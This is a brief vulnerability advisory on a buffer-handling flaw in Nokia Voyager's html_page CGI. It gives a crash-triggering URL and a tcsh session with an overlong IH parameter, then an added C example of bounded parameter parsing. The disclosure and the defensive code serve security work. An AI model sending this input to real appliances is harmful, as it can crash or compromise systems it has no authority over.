Vulnerability Nokia Voyager Affected Nokia Voyager Description Gregory Duchemin found following. Voyager works with a multipurposes cgi called html_page that make a call to html_gen with a filename as a template script. Html_gen produce the final html page returned by apache. If You test this kind of URL: http://your-nokia/http://10.1.152.2/cgi-bin/html_page?TEMPLATE=arp&IH=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA You'll get a segfault error page. If u test it with a command line, You'll reproduce the same signal. Obviously, html_gen is unable to manage properly a big amount a data in some of its parameters. IH is one of the html_page's paramaters that does the job. With telnet, try (under tcsh) #setenv QUERY_STRING "TEMPLATE=arp&IH=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" #/web/cgi-bin/html_page Content-type: text/html <br>Html_gen exited because of signal: Segmentation fault<br> nokia1[admin]# Solution Because u already must be administrator to access the voyager setup, security impact is relatively low considering that default configuration wasn't poorly modified. Because nokia ipso isn't dedicated for a multi-user work usage and noone else root should be able to login, impact for local rooting is low too considering the same things that above.
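
The crash above is triggered by an overlong IH value in QUERY_STRING. As an added example (not code from html_page, html_gen or Nokia), this is how a CGI program can extract such a parameter with an explicit length check and reject the request instead of overrunning memory. The helper get_param, the 64-byte limit and the 400 response are assumptions made for the example; the page does not show html_gen's source or the exact cause of the fault.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: copy the value of parameter `name` from a CGI query
 * string into `out` (capacity `outsz`, including the terminating NUL).
 * Returns the value length, -1 if the parameter is absent, or -2 if the
 * value does not fit, in which case nothing is copied. */
int get_param(const char *qs, const char *name, char *out, size_t outsz)
{
    size_t nlen = strlen(name);

    if (outsz == 0)
        return -2;
    out[0] = '\0';

    while (qs != NULL && *qs != '\0') {
        size_t plen = strcspn(qs, "&");   /* length of this key=value pair */

        /* Match the whole key, so "IH" does not match "XIH" or "IHX". */
        if (plen > nlen && strncmp(qs, name, nlen) == 0 && qs[nlen] == '=') {
            size_t vlen = plen - nlen - 1;

            if (vlen >= outsz)            /* too long: refuse, never truncate */
                return -2;
            memcpy(out, qs + nlen + 1, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        qs += plen;
        if (*qs == '&')
            qs++;
    }
    return -1;
}

int main(void)
{
    char ih[64];                          /* assumed limit for this example */
    int n = get_param(getenv("QUERY_STRING"), "IH", ih, sizeof ih);

    if (n == -2) {                        /* oversized value: fail cleanly */
        fputs("Status: 400 Bad Request\r\nContent-type: text/plain\r\n\r\n"
              "IH too long\n", stdout);
        return 1;
    }
    printf("Content-type: text/plain\r\n\r\nIH length: %d\n", n);
    return 0;
}
```

Run with QUERY_STRING set as in the tcsh session above, the program returns the 400 response rather than dying on a signal.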